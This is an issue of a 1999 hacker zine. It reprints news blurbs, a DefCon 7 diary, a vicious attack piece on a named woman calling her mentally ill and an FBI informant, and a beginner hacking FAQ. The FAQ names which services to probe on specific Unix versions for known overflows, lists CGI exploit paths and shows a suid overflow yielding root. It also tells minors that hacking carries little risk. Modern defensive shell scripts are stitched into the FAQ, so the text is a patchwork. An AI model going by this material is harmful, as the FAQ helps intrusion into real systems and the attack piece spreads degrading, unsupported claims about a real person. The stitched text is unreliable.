    ++ A NUTS-AND-BOLTS HOUSEKEEPER (TECH. 3:00 am)
       http://www.wired.com/news/news/email/explode-infobeat/technology/story/21060.html
 
       To hell with your Hoover. A new domestic robot will vacuum
       your floor and carry the dishes for you. But your new
       housemate is a long way from having a personality. By
       Lindsey Arent.


    ++ COURT HAS A NASTY WORD FOR MS (POL. Wednesday)
       http://www.wired.com/news/news/email/explode-infobeat/politics/story/21096.html

       As if Microsoft weren't having enough trouble with the courts
       these days, jurists are upset because Word 97 is doing a
       lousy job word-counting legal briefs. By Declan McCullagh.
       
    ++ A PALM IN THE TOOL BELT (TECH. Wednesday)
       http://www.wired.com/news/news/email/explode-infobeat/technology/story/21094.html

       Construction workers are using PalmPilots onsite to download
       blueprints and help plan for the weather. Staying connected
       is yielding concrete results. By Lindsey Arent.
    


    ++ MICROWORKZ SIGNS ON AT&T (TECH. Wednesday)
       http://www.wired.com/news/news/email/explode-infobeat/technology/story/21091.html

       Dumped by Earthlink just days ago, the PC provider smoothes
       its feathers and turns to AT&T to provide iToaster customers
       with free Net access.
           
    ++ RIAA, DIAMOND SWEEP AWAY SUIT (POL. Wednesday)
       http://www.wired.com/news/news/email/explode-infobeat/politics/story/21089.html

       The recording industry makes peace with the MP3 maker, but
       questions over a new standard raises a new question: Will it
       last? By Chris Oakes.
           
     
     
      Thanks to myself for providing the info from my wired news feed and others from whatever
      sources, also to Spikeman for sending in past entries.... - Ed
      
     @HWA

 01.2 MAILBAG - email and posts from the message board worthy of a read
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
     

 02.0 From the editor.
      ~~~~~~~~~~~~~~~~

     #include <stdio.h>
     #include <thoughts.h>
     #include <backup.h>

     main()
     {
      printf ("Read commented source!\n\n");

     /*A mixed bag of nuts in this issue, read on and enjoy..hope you
      *find something interesting or useful...
      * issue #28
      * 
      * hwa@press.usmc.net
      *
      */
      printf ("EoF.\n");
      }

      

      Congrats, thanks, articles, news submissions and kudos to us at the
     main address: hwa@press.usmc.net complaints and all nastygrams and
     mailbombs can go to /dev/nul nukes, synfloods and papasmurfs to
     127.0.0.1, private mail to cruciphux@dok.org

     danke.

     C*:.
     
 03.0 Debunking the debunked by route
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From www.antionline.com
      
      Debunking The Debunked 
      Wednesday, July 28, 1999 at 23:57:30
      by Mike D. Schiffman - Reprinted With Permission 
 
      In a 16-foot wide 9-year old trailer park home in New Mexico, a
      52-year old delusional woman sits in front of a computer toiling away
      on a non-technical "hacking" document fraught with errors.
 
      You might remember Carolyn P Meinel as 'The Happy Hacker' from
      such E-Files as "A Weekend Without My Zoloft" and the underground
      classic "Has Anyone Seen My Dignity?"
 
      Although some people would like to classify Carolyn as 'merely'
      delusional or talent-less, our research has added 'washed-up crackpot'
      and 'media charlatan.' Often we wonder how Carolyn has achieved so
      little over so much time, and with this brief interlude, we peel back the
      layers of the onion with an exclusive report from DefCon7.
 
      As it happened during the weekend of July 9th in Las Vegas, NV at
      the seventh installment of the DefCon Security Convention, it appears
      that Carolyn forgot her medicine. And these aren't simple antibiotics or
      histamine blockers (although she could probably use those too). No
      dear friends, these are powerful psycho-reactive mind-altering
      chemicals such as sertraline hydrochloride and diazepam. This woman
      has serious mental problems that require medication and treatment. 
 
      We caught up with Carolyn in the hotel bar at the Alexis Park, this
      interviewer was participating in some lighthearted revelry with friends
      and cohorts, enjoying the ebb and flow of the convention we've come
      to know and love... Late into the night we had a great time recounting
      times past.
 
      As the night progressed, we moved the group out of the bar into the
      hotel foyer where our merriment was abruptly halted. The foul stench
      of insanity lingered in that part of the hotel, and it was instantly known
      to all that Carolyn was upon us.
 
      Initially, I found myself finding a good deal of humor with her attire, I
      pondered the drifter's corpse that she absconded her dress from, and
      focused on my mission at hand. The question on everyone's lips:
 
      "Is Virginia here this year?"
 
      However, before I could gather my senses, a whirlwind of stupidity
      was unleashed as Carolyn's disease attempted to spread to another
      mind. With her gaping maw open, she turned the boring-machine up to
      11 and hosed down an unsuspecting convention-goer.
 
      With all that had happened, I was stunned. This was the heaviest blow
      of all. I could find no other recourse but to confront her on one of the
      numerous topics that burn in the scene. It was, at that time still unclear
      to me why she had misinformed the FBI that I was involved in HFG,
      and I decided to question her on that, in the hopes of two results.
      Intended result #1 was to shut her the fuck up for a minute. Intended
      result #2 was to get an explanation, apology, or at best a
      rationalization. However, as she turned to me with the vapid stare of
      ignorance, I knew no one could win this battle. No good would come
      from this conversation, and Carolyn made sure of that.
 
      Initially, Carolyn feigned stupidity (which was eerily convincing, but
      even the best lies are peppered with truth) and claimed she didn't
      know me. Having dealt with this woman numerous times (including a
      few *shudder* face-to-face meetings) and given she tried to implicate
      me within the ranks of HFG, the ruse lacked even humor, as the
      attempt was so weak.
 
      After a few hot comments were traded, Carolyn's attempt at throwing
      down the gauntlet was to challenge myself and my cohorts to 'hack'
      into her modified Linux box. Now, perhaps Carolyn misunderstands
      the way the new generation of hacker-types operate. First of all, we
      don't get out of bed for less than a hundred dollars. And we certainly
      don't waste our time breaking into a machine that serves no real
      purpose. Why Carolyn used her box in the capture the flag
      competition as a challenge is beyond us, as her personal website has
      been hacked more times than are worth counting. And honestly, at this
      point, who hasn't received a DCC offer of her mailbox or home
      directory tarred up? If that is not evidence of her inability to truly
      secure a box, then I don't know what is. Granted, she wished to rest
      on her insignificant laurels, and a subtle crack about using finger to
      break into her box was sufficient to defuse that portion of the
      conversation.
 
      With her last karate-inept leg kicked out from underneath her, Carolyn
      attempted to leave with a modicum of respectability, which sadly
      slipped from her grasp due to her own failings and incompetence...
 
      The Granny Hacker from Heck? Hardly (except the older-than-dirt
      part). The Clown Princess? I suppose this is half true. Clowns are an
      amusing sort, accustomed to being ridiculed. But I think she missed the
      princess bit by about 30 years. The Happy Hacker? She didn't seem
      very happy to us. Especially with the 3 part Antionline article, that
      starts off attempting to be slightly informational, but ends up being a
      diatribe of self-promotion and bitter remarks about convention goers.
 
      No Carolyn, you're not part of "the club". We're sorry, but you're too
      crazy, too medicated, too old, and too stupid.
 
      Also, Carolyn, you had more than a week between the end of DefCon
      and the posting of the Antionline article. The best insult you could
      come up with was to say I `pumped my muscles up with a bike
      pump`? I mean, what sort of 1940's street-tough book of insults are
      you consulting? Double dumbass on you Carolyn.
 
      Contrary to what she swears up and down, Carolyn Meinel is indeed a
      confidential informant for the Federal Bureau of Investigation, and her
      status is listed as "MI" and "PS". MI indicates that the informant suffers
      from a mental or emotional dysfunction, and all information must be
      scrutinized as such. PS means that she is a probable suspect. This is
      why the FBI polygraphed her. Do you trust her?
 
      Now, don't get us wrong. We actually like Carolyn Meinel. As Virii
      makers have a symbiotic relationship with companies that make
      Anti-Virii software, true hackers and their ilk have a symbiotic
      relationship with the uninformed vocal nay-sayers that try to misinform
      the public as to our actions. Without Carolyn, no one would know
      how great we really are. It is impossible to fully appreciate what
      `good` is when you have no frame of reference in understanding what
      `bad` is. For this, we can only thank you Carolyn. Your efforts and
      misinformation only further our roles as highly paid debunkers of your
      insanity. When you're 65 and retired, or possibly deceased -- we'll just
      be entering the prime of our lives and professional careers. If you're
      still around then and your descent into lunacy hasn't pushed you over
      the brink, look us up. We love clowns.
 
      And, by the way Carolyn, do send Virginia my love.
 
 
     @HWA    
     
04.0 DefCon 7 by Agent X
     ~~~~~~~~~~~~~~~~~~~
     
     (Thanks to Agent X for permission to reprint this - Ed)
     
     Defcon 7 
     
     by 
     
     Agent X 
     
      
     
     Prelude
     
     Defcon baby, yeah that's the ticket, hackers, computer security consultants, feds, kooks, surveillance geeks, and a whole slew of other weird ass spooky mother
     fuckers, get drunk, go to titty bars, talk about crypto and network security, fucking with the media, blowing shit up in the desert and generally have a great fucking
     time in the city of sin all under the guise of a computer security convention. And if they are lucky or sneaky, paid for by their respective bosses. I am neither lucky nor
     sneaky so I'm paying for this out of my own pocket, which by the way sucks. But I'm ready, the tickets are bought, the gear is packed. I have fortified myself for this
     trip, with a bowl of corn flakes, a cache of CDs, and a hangover. I dry swallow two Aleve as I step out the door.
     
     The 3 hour bus ride to the airport was about as exciting as a 3 hour bus ride can be. In other words deathly boring. But the headache is gone. I'm at the airport
     lounge, drinking a L.I.T and trying to figure out if 7 bucks is too much to pay for a burger. Airports are about the most boring places to be stranded for any length of
     time as well. The televisions only show 2 things, golf or 5 minute news reels. The food is generic and expensive. And there is no fucking place to check my e-mail.
     Only another 4 hours till my plane leaves. The Plane: It's a sign when 12 mothers carrying screaming babies get on the flight. We hit the worst turbulence I have ever
     seen or felt. [the guy beside me just used his barf bag for its intended purpose]. I can see it now, the wings snap off and barrrroooooooom! I'm just another flight statistic.
     Wouldn't that just be the rat's asshole to die on the way to Detroit.
     
     [Note: at this point this article goes into shorthand mode, there was just too much happening too quickly for me to mention, remember or talk about]
     
     Friday
     
     From this point on things become an insane blur of meeting new people and getting things done. I arrive 3 hours late to the hotel, the people I'm staying with had a
     hell of a time checking in and I'm exhausted, I have a glass of water and go to bed. Friday First day of con I get up, get dressed and eat some breakfast all by 7:00.
     To do my part by gooning at the con. Big mistake. It's a mad rush after that, from getting a goon badge to working on pre-registration. The List for registration is
     great except that it's not in any order. So I GREP the whole list a couple of hundred times during the con. I check people in all day long. By the end of the day I
     know almost everyone at con who is on the list. Naked people count for Friday: 1 guy gets up on a table and strips down to his G-string, 2 naked fat guys jog
     around the vendor area for free t-shirts, 1 babe hops up on a table and gives everybody a show of her tits. I love Vegas. The day is hectic and long. I'm exhausted by
     the time I sit down at 7:17 to write this before heading out to the MGM grand for some dinner. Vegas is a weird as ass place. New York New York the most
     disturbing of all. The fake graffiti, the fake manhole cover with fake steam, all in fake NYC, it is not right. I was just waiting for a fake mugging in a fake dark and dirty
     alley. After getting back to the hotel I collapsed on the bed.
     
     Saturday
     
     Slept a hard 8 hours last night, got up and helped register people, mad craziness, more people than you could possibly imagine. All of them young white males. Checked
     out the DJ action, saw my ghetto hacker buddies TDA and Jester 47 spin some mad tunes to Ninja Scroll video. The CDC show rocked ass. Total mayhem, with a
     revival theme, it doesn't get much better than this. Things slowed down a bit. Checked press badge for the After CDC presentation in the media suite. Went up and
     talked with some media types. Got to see what the media is like in action. I expected to hear some really probing questions that were well researched and insightful.
     They weren't, nuff said. Finally got to chill about 7 or 8, helped set up for the root suite party. Went back to my room, changed and got booze, went back to the root
     suite and proceeded to drop a complete bottle of tequila on the floor. Saturday night Mad partying in the root suite Saturday night. I played bartender for most of the
     night, pouring DoC beers, serving punch and mixing drinks. Dis Org Crew beer was great. The Strawberry SYN Flood was smooth and sweet, the Brown Box
     Barley Wine was strong as hell, and the FireWire Stout which is fortified with caffeine is the perfect hacker beer. Congrats to HCF, Wyatt Earp, Pete Shipley and
     the rest of the DoC who helped for a great beer. Caezar definitely knows how to throw a party. Towards the end of the night I was getting help from Jennifer
     Granick. Left about 4 or 5, went back to the room and slept like the dead. Slept for 2 hours and got back up. I had an English muffin for breakfast, it was good.
     
     Sunday
     
     By Sunday the kinks had been somewhat worked out and things were finally running reasonably smoothly, I helped with this and that. Sold shirts and mugs for the
     better part of the morning, some guy wanted to trade a rental car for a t-shirt, I told him to get permission from Priest. He ended up trading us some porno passes
     for a shirt instead. Finally had lunch with some cool people, one of whom was with the NSA. After lunch I'm up in the media/goon lounge resting and eating some
     fruit with Major Malfunction when his radio goes off, "all goons to the NOC" and then "Carolyn is being kicked out". Needless to say Carolyn got kicked out of con.
     I'm sure that she will write all about it on her web site. I'm sure she will paint herself as the victim, either way I don't care, she is an adult and she should have known
     better. Afterward I wandered around some more. Said good-bye to all the people I could find. Went back to the hotel, grabbed my bag and got on a plane, fell
     asleep. Switch planes fell asleep. got off plane got on bus fell asleep, switch busses fell asleep. Got off bus got home fell asleep. ....till next year.
     
       
          Quotes from the weekend: 
     
     A short conversation I had with some newbie kid who wandered into the root party.
     " So you're in l0pht"
     " oh yeah me and the rest of the east coast people"
     "really"
     
     "My son did his first hack at age 7, I was so proud." Major Malfunction. 
     
     
     Who: Agent X is a slacker. The views, commentary and ideas expressed in this article are not those of Hacker News Network, its Editors or the Defcon Organizers.
     I own my own words.               
     
     Agent_X@flashmail.com
     
     
     Links referenced in the original HTML version of this article:
     http://www.defcon.org
     http://www.cultdeadcow.com/
     http://www.dis.org/doc.html
     http://www.dis.org/warz/beer.html
     http://www.caezarschallenge.org/
     
     
     @HWA
     
05.0 Hacking Faq by ben-z 5/14/99
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
     There are a number of "hacking faqs" around the net, most of which date back at the very least to 1996.
     This is one of the few 'new' ones I've come across, so I've decided to share it here for your reading
     pleasure. It's aimed at the 'newbie hacker' and is written by a well known underground denizen, ben-z
     - Ed
          
     Found at http://come.to/sota
     
          
                   [**] FAQ: Hacking @ 5/14/99 by ben-z [**]
          NOTE: if date > */2000, dont bother reading this.
             http://www.slacknet.org | benz@slacknet.org
     
     
     A. Section [I] -- Beginners
      (index)
      01. How do i tell if a system is running UNIX?
      02. How do i determine which flavor of UNIX a system runs?
      03. What exactly happens when i "hack" UNIX?
      04. Do I need an account on a system to hack it?
      05. What is DoS?
      06. How do I protect myself from DoS attacks?
      07. What is a buffer overflow?
      08. What are some good web/ftp sites for UNIX?
      09. What is BSD?
      10. What is Linux?
      11. What does x86 have to do with anything?
      12. What else is there besides x86 systems?
      13. What are some commonly open services to look for?
      14. What is the easiest way to hack a system right now?
      15. Can i hack anything from windows?
      16. Why is Linux a better OS than windows?
      17. What is suid/sgid?
      18. Where is the best source of info for newbies?
      19. How much trouble can I get in for hacking?
      20. What kind of system should I try hacking first?
     
     
     
      (Q/A)
     
      01. How do i tell if a system is running UNIX? 
        A:  There are several ways to determine the operating system of a remote 
         system. The first and foremost way to determine if a system is running 
         UNIX is to both telnet and ftp to it, then check the login message. For 
         telnet, if you get anything like BSD, UNIX, Linux, AIX, IRIX, or HPUX 
         then it is most likely a unix system. However, it is possible to change 
         the message displayed (/etc/issue.net) when a telnetd connection is
         established, so telnet banner grabbing is not always the most reliable. 
         Via ftp, you can usually make a fairly accurate guess at the OS by looking 
         at the ftpd version. If you see something like wu, ncftpd, or proftpd, then
         it is a UNIX system. Most large ftp archives run UNIX, but just in case, 
         look for a message containing "Microsoft" or "Serv-U", which do not run on
         anything but ms windows (bad!).
         Another more accurate way of determining the OS is to examine the packets 
         via predetermined OS fingerprints. There are several packages out now
         which do this, the best of them being nmap by fyodor
         (http://www.insecure.org/nmap), and queso by els apostols. These simply
         scan the open ports on a system and attempt to find a match for the packet 
         types. Nmap currently includes hundreds of OS fingerprints, and is known 
         for its accuracy and speed. OS fingerprinting is not one-hundred percent 
         accurate either; the details of this are too complex for this paper.
         Basically, some system administrators change the look of the outgoing 
         packets to fool your scanner into thinking it is something else, or give it
         no reading whatsoever. The details are available at 
         http://www.geek-girl.com/bugtraq.
     
     
      02. How do i determine which flavor of UNIX a system runs?
        A:  (see telnet banner grabbing description above) -- telnet banners
         often reveal which OS and version the system is running. If you have
         local access to the machine (an account), then you can type uname -a to 
         see some system information. On Linux, you can cd to /proc and cat cpuinfo 
         for other interesting stats. If the system is running RedHat Linux, then
         a file exists in /etc called redhat-release which contains the release and 
         version of the system.
         I am also working on a package to determine the distribution of a system 
         via comparing rpm's to known fingerprints (similar to nmap), thus making 
         it easier to find an exploit which will work on the system.
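
The banner disclosure that answers 01 and 02 describe can be checked from the administrator's side. The script below is an added example, not part of ben-z's FAQ: it scans banner text such as /etc/issue.net for the OS and ftpd names the FAQ lists plus dotted version numbers. The function names, the token list and the sample banners are assumptions constructed for illustration.

```shell
#!/bin/sh
# Added example: audit login/ftp banner text for OS-identifying strings.
# The token list is an assumption built from the names given in the FAQ
# answer (BSD, UNIX, Linux, AIX, IRIX, HPUX, wu, ncftpd, proftpd,
# Microsoft, Serv-U); extend it for your own site.

OS_WORDS='bsd|freebsd|openbsd|netbsd|unix|linux|aix|irix|hpux|hp-ux|sunos|microsoft|serv-u|wu|ncftpd|proftpd'
# Dotted version numbers such as 5.2 or 2.0.36
VERSION_RE='[0-9]+(\.[0-9]+)+'

# banner_leaks: read banner text on stdin and print every identifying
# token once, lower-cased, one per line, in C-locale sort order.
# -o prints only the matched text, -w requires whole-word matches,
# -i ignores case, -E selects extended regular expressions.
banner_leaks() {
    grep -owiE "($OS_WORDS)|$VERSION_RE" | tr 'A-Z' 'a-z' | LC_ALL=C sort -u
}

# audit_banner FILE
#   returns 0 if the banner discloses nothing from the token list,
#           1 if it does (and prints what was found),
#           2 if the file is missing or unreadable.
audit_banner() {
    [ -r "$1" ] || return 2
    leaks=$(banner_leaks < "$1")
    if [ -z "$leaks" ]; then
        return 0
    fi
    # Unquoted $leaks joins the one-per-line tokens with single spaces.
    printf '%s: discloses: %s\n' "$1" "$(echo $leaks)"
    return 1
}

# Demonstration on constructed banners (not taken from any real host).
demo() {
    dir=$(mktemp -d) || return 1
    printf 'Red Hat Linux release 5.2 (Apollo)\nKernel 2.0.36 on an i586\n' \
        > "$dir/default.net"
    printf 'Authorized use only. Activity is logged.\n' > "$dir/hardened.net"
    for f in "$dir/default.net" "$dir/hardened.net" "$dir/missing.net"; do
        rc=0
        audit_banner "$f" || rc=$?
        echo "$(basename "$f"): exit status $rc"
    done
    rm -rf "$dir"
}

demo
```

A clean result only means the banner no longer volunteers the OS; as the FAQ notes, packet-level fingerprinting does not depend on the banner at all.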
     
     
      03. What exactly happens when i "hack" UNIX?
        A:  To know whether or not you have successfully "hacked" a UNIX system, 
         there are a few commands you need to be familiar with:
      _______________________________________________________________________________
      | command  | description                                                      |
      |-----------------------------------------------------------------------------|
      | id       | prints your current UID/GID. 0 = root = success!                 |
      | whoami   | determines which user you are logged in as.                      |
      | set      | shows a list of some system variables including $USER and $EUID. |
      -------------------------------------------------------------------------------
         If you don't know what root is, then you need to do some background UNIX 
         research before reading this again. Otherwise, here are a few other tricks 
         to see if you are really root.
          a. bash prompt: When logged in as a normal user, you usually have a prompt
                          similar to bash$. As root, your prompt defaults to bash#.
          b. system variables: typing echo "$USER / $EUID" *should* effectively tell
                               you which user the system thinks you are.
          c. file access: As root, you should have access to read/write most files. 
                          Try logging in as a normal user and reading /etc/shadow 
                          or /etc/passwd. Most systems do not allow normal users to 
                          read these files for security reasons; however, if you are 
                          root, you may read/write them as you wish.
     
     
      04. Do I need an account on a system to hack it?
        A:  No. Many systems can be compromised remotely via overflows in vulnerable
         services running. This is the main difference between hacking UNIX and NT: 
         UNIX was designed with remote administration in mind, thus making it easier
         to manipulate once access is obtained. With NT, no telnet daemon is 
         present, and playing around usually requires your presence at the actual 
         system itself. Of course anyone with 1/2 of a brain can secure their system
         from remote attacks, so a local account is a definite bonus.
     
     
      05. What is DoS?
        A:  No kiddies, this isn't C:\DOS. This is Denial of Service, a very deadly 
         (and lame) concept. As there are very few useful purposes for DoS, it is 
         mostly used to show power and skill, even though it requires almost no
         skill whatsoever. The only useful reason I can think of to DoS a system is 
         for spoofing purposes: when a system is taken off of a LAN, you can change 
         your address to the one you knocked off, and intercept vital information 
         and user passwords. This is explained in detail at http://www.rootshell.com
         (under documentation) look for whitepapers on tcp hijacking. Ok, back to 
         my explanation of DoS. Denial of Service by definition is simply denying 
         service to any machine on a network, thus causing problems and/or crashing 
         the system. The most popular DoS attacks out right now (to my limited 
         knowledge) are papasmurf, boink/poink, feh, smack, bmb, and synk5. These 
         are commonly used toys on irc, so watch your back.
     
      
      06. How do I protect myself from DoS attacks?
        A:  There is no one-hundred percent reliable method for stopping DoS 
         attacks. If the attacker's bandwidth is much greater than yours, then you 
         lose: end of story. However, if the attacker has equal or lesser resources 
         than you, they are easily filtered out by software such as ipfwadm for 
         Linux 2.0.x, ipchains for Linux 2.2.x, and ConSeal PC Firewall for Windows. 
         Some interesting firewall/filtering scripts can be found at 
         http://www.freshmeat.net and http://www.linuxberg.com. If you like to
         chat on irc (yay!), then it is wise to use a bnc (bounce) to hide your real
         address and virtually irc off of a faster connection. bnc source is
         available for download at ftp.bitchx.org/pub/misc.
     
      
      07. What is a buffer overflow?
        A:  In short, a buffer overflow is the pushing of more data onto a stack 
         than the program set aside room for, thus executing carefully constructed
         code as the user the program is running as. 
          Example:
           [benz@oldbox]$ whoami
           benz
           [benz@oldbox]$ /usr/bin/sperl4.036 AAAAAA(etc..) [garbage]/bin/sh
           Segmentation Fault
           [root@oldbox]# whoami
           root
         The above log is an example of the classic sperl overflow which drops root 
         access. To make sure the program you are trying to overflow will give you 
         root, you need to type ls -al file and look for "s" in the permissions
         somewhere, and that it is owned by root. This indicates that the program 
         is suid/root and when run will actually switch to user root and execute.
         This explanation is a very short and simple version of a complex topic, 
         which can be studied in more detail at http://www.phrack.com - issue 49-14:
         "Smashing the Stack for Fun and Profit" by Aleph One.
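
         The ls -al check described above can be run as an audit over a whole
         listing on a machine you administer, to see which suid/root programs
         exist and decide which ones really need the bit. This is an added
         example, not part of the original FAQ; the function names and the
         sample listing are constructed (only /usr/bin/sperl4.036 is from the text).

```shell
#!/bin/sh
# Added example: classify set-id files from `ls -l` output.
# Mode string layout: char 1 = file type, 2-4 = owner rwx, 5-7 = group rwx,
# 8-10 = other rwx. An "s" in slot 4 means setuid, in slot 7 setgid.
# A capital "S" means the set-id bit is on but the execute bit is off.

# Constructed sample listing (not real system output).
sample_listing() {
    cat <<'EOF'
-rwsr-xr-x   1 root     root        12345 Aug  7  1999 /usr/bin/sperl4.036
-rwxr-xr-x   1 root     root        54321 Aug  7  1999 /bin/ls
-rwsr-xr-x   1 benz     users        2222 Aug  7  1999 /home/benz/tool
-rwxr-sr-x   1 root     tty          3333 Aug  7  1999 /usr/bin/write
drwxr-sr-x   2 root     staff        4096 Aug  7  1999 /usr/local/share
-rwSr--r--   1 root     root          100 Aug  7  1999 /tmp/odd
EOF
}

# audit_setid: read `ls -l` lines on stdin, print "<class> <path>" for every
# regular file with a set-id bit. Classes, in priority order:
#   suid-root   setuid and owned by root (runs as root for any caller)
#   suid-other  setuid, owned by another user
#   sgid        setgid only
# Directories are skipped: setgid on a directory only controls group
# inheritance of new files.
audit_setid() {
    awk '
    substr($1, 1, 1) == "-" && NF >= 9 {
        u = substr($1, 4, 1)          # owner execute slot
        g = substr($1, 7, 1)          # group execute slot
        path = $9                     # name starts at field 9
        for (i = 10; i <= NF; i++) path = path " " $i
        if (u == "s" || u == "S") {
            kind = ($3 == "root") ? "suid-root" : "suid-other"
            print kind, path
        } else if (g == "s" || g == "S") {
            print "sgid", path
        }
    }'
}

# Run against the constructed sample. On a host you administer, feed it a
# real listing instead (LC_ALL=C keeps the date at three fields):
#   LC_ALL=C find / -xdev -type f \( -perm -4000 -o -perm -2000 \) \
#       -exec ls -l {} + | audit_setid
sample_listing | audit_setid
```

         Every suid-root line is a program that executes with root's
         privileges no matter who starts it, so each one that is not needed
         should lose the bit (chmod u-s) or be removed.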
     
     
      08. What are some good web/ftp sites for UNIX?
        A:
         Bugtraq security mailing list: http://www.geek-girl.com/bugtraq
         rootshell archives (out of date): http://www.rootshell.com
         technotronic archives: ftp://ftp.technotronic.com
         SlackNet: http://www.slacknet.org
         Linux.org: http://www.linux.org
         FreeBSD.org: http://www.freebsd.org
         Packetstorm: http://packetstorm.genocide2600.com
         2600 magazine: http://www.2600.com
         Phrack magazine: http://www.phrack.com
     
     
      09. What is BSD?
        A:  BSD, short for Berkeley Systems Distribution, is a UNIX flavor known for 
         its stability and ease of use. More information can be found at
         http://www.freebsd.org, http://www.openbsd.org, www.bsdi.org, etc.
     
     
      10. What is Linux?
        A:  Linux, originally developed by Linus Torvalds, is a POSIX based OS
         commonly used by everyone from hackers to goat feeders. More information
         can be found at http://www.linux.org.
     
     
      11. What does x86 have to do with anything?
        A:  x86 is the standard abbreviation for an Intel processor based
         system. The x has nothing to do with the processor, it is simply a 
         wildcard definition for all *86 systems. Example: i386, 586 (pentium).
     
     
      12. What else is there besides x86 systems?
        A:  Besides Intel based systems, there are many other architectures
         used with UNIX. Probably the most common non-x86 architecture is a
         sparc. Although capable of handling almost anything, these typically
         run either SunOS or Solaris.
     
     
      13. What are some commonly open services to look for?
        A:  The services I generally look for the most are very dependent on
         what OS the target is running. For example, if the target system is
         Linux 2.0.3x, I typically scan for rpcbind/portmap on tcp/111 because of
         the well known mountd overflow. Below is a brief list of what I check for
         specifically on several operating systems.
          Redhat 4.2: tcp/143 (imap), etc..
          RedHat 5.0: tcp/25 (sendmail), tcp/143 (imap), tcp/25 (qpop), tcp/53 (bind)
          RedHat 5.1: tcp/111 (rpcinfo -p <target>), tcp/110 (qpop), tcp/53 (bind)
          RedHat 5.2: tcp/21 (wu-2.4.2-academ[BETA-18](1))
          Slackware: tcp/111 (rpc), tcp/110 (qpop), tcp/21 (wu-ftpd), tcp/53 (bind)
          FreeBSD: tcp/110 (qpop), tcp/143 (imap), tcp/53 (bind)
          Solaris: tcp/110 (rpc), tcp/53 (bind)
          
          
      14. What is the easiest way to hack a system right now?
        A: <see #13 for service list>
     
     
      15. Can I hack anything from windows?
        A:  Surprisingly, yes. There are about 50 different ways you can hack
         with just a web browser. These are known as cgi exploits; below is a list
         of several which I typically check for:
            /cgi-bin/phf
            /cgi-bin/php.cgi
            /cgi-bin/Count.cgi
            /cgi-bin/info2www
            /_vti_pvt/service.pwd
            /cgi-bin/test-cgi
            /cfdocs/expeval/openfile.cfm
            /cgi-dos/args.bat
            /cgi-win/uploader.exe
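
         Because these paths are requested by name, a web server's access log
         shows when someone is checking for them. The detection sketch below is
         an added example, not part of the original FAQ; it assumes Common Log
         Format, and the function names and log lines are constructed.

```shell
#!/bin/sh
# Added example: flag clients requesting the CGI paths listed in the FAQ.

# Watch list: the nine paths from the list above, nothing else.
PROBE_PATHS="/cgi-bin/phf /cgi-bin/php.cgi /cgi-bin/Count.cgi /cgi-bin/info2www \
/_vti_pvt/service.pwd /cgi-bin/test-cgi /cfdocs/expeval/openfile.cfm \
/cgi-dos/args.bat /cgi-win/uploader.exe"

# Constructed Common Log Format sample (documentation address ranges).
sample_access_log() {
    cat <<'EOF'
192.0.2.10 - - [07/Aug/1999:10:00:01 -0400] "GET /index.html HTTP/1.0" 200 1043
192.0.2.44 - - [07/Aug/1999:10:00:05 -0400] "GET /cgi-bin/phf?a=1 HTTP/1.0" 404 210
192.0.2.44 - - [07/Aug/1999:10:00:05 -0400] "GET /cgi-bin/phf HTTP/1.0" 404 210
192.0.2.44 - - [07/Aug/1999:10:00:06 -0400] "GET /cgi-bin/test-cgi HTTP/1.0" 404 210
192.0.2.44 - - [07/Aug/1999:10:00:07 -0400] "GET /_vti_pvt/service.pwd HTTP/1.0" 404 210
198.51.100.7 - - [07/Aug/1999:10:02:00 -0400] "GET /cgi-bin/Count.cgi?df=home.dat HTTP/1.0" 200 87
198.51.100.7 - - [07/Aug/1999:10:02:09 -0400] "GET /CGI-BIN/PHF HTTP/1.0" 404 210
192.0.2.10 - - [07/Aug/1999:10:03:00 -0400] "GET /cgi-bin/search.cgi?q=phf HTTP/1.0" 200 512
EOF
}

# detect_cgi_probes: read access-log lines on stdin and print, per client,
#   <client> <distinct watched paths requested> <total matching requests>
# The path is compared without its query string and case-insensitively,
# because the cgi-dos/cgi-win entries live on case-insensitive servers.
detect_cgi_probes() {
    awk -v paths="$PROBE_PATHS" '
    BEGIN {
        n = split(paths, p, " ")
        for (i = 1; i <= n; i++) watch[tolower(p[i])] = 1
    }
    {
        # The request line is the first double-quoted field: METHOD PATH PROTO
        if (split($0, q, "\"") < 3) next
        if (split(q[2], req, " ") < 2) next
        path = tolower(req[2])
        sub(/\?.*/, "", path)              # drop the query string
        if (!(path in watch)) next
        client = $1
        hits[client]++
        if (!((client, path) in seen)) {
            seen[client, path] = 1
            distinct[client]++
        }
    }
    END {
        for (c in hits) print c, distinct[c], hits[c]
    }' | LC_ALL=C sort
}

# Run against the constructed sample.
sample_access_log | detect_cgi_probes
```

         A client with several distinct watched paths in a short time is
         walking the list; a single 200 for something like Count.cgi may just
         be a page that legitimately uses it.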
            
     
      16. Why is Linux a better OS than windows?
        A:  There are hundreds of reasons why Linux owns windows, but instead
         of explaining all of them, I'll just give you some advice: take my
         word for it. If you happen to be one of those people that needs facts
         to survive, check out http://www.darkelf.net/metachart.
     
     
      17. What is suid/sgid?
        A: <see #07>
     
     
      18. Where is the best source of info for newbies?
        A:  My best recommendation would definitely have to be irc. Since most
         hackers tend to learn things on their own, hacking resources are not as
         plentiful as they probably should be, but there are still excellent sources
         available. See the URL section above for more information.
     
     
      19. How much trouble can I get in for hacking?
        A:  The typical student hacker (such as me) is still under the age of
         18, rendering him a minor. If adult charges cannot be filed, then don't
         worry about much other than a harsh bitching and possibly a small fine.
         For those of you that no longer have the age advantage, I recommend
         consulting a lawyer before getting seriously into hacking. This may sound
         a bit extreme, but anyone who gets good enough to be noticed needs a
         lawyer eventually anyway. For some information on what can happen as
         an adult, just take a look at http://www.kevinmitnick.com.
     
     
      20. What kind of system should I try hacking first?
        A:  For beginners, the first computer I recommend trying to root is
         your own. There is no better way of security and learning than a local 
         machine that you actually own and operate. Try experimenting with
         several UNIX flavors such as Linux and BSD, then it's up to you from there.
     
     
     
     
     [**] don't worry.. part [II] Intermediate instruction is coming! [**]
     
     
     @HWA
     
06.0 Group approves controversial software law 
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
     Contributed by D----Y
     
     
     http://www.infoworld.com/cgi-bin/displayStory.pl?990729.ecucita.htm

     Group approves controversial software law 
   
     By Jack McCarthy, Nancy Weil, and Jessica Davis 
     InfoWorld Electric 
   
     Posted at 5:00 PM PT, Jul 30, 1999 
     In a blow to both big corporate software consumers and those who buy their software in retail stores, a group that works to unify state laws this
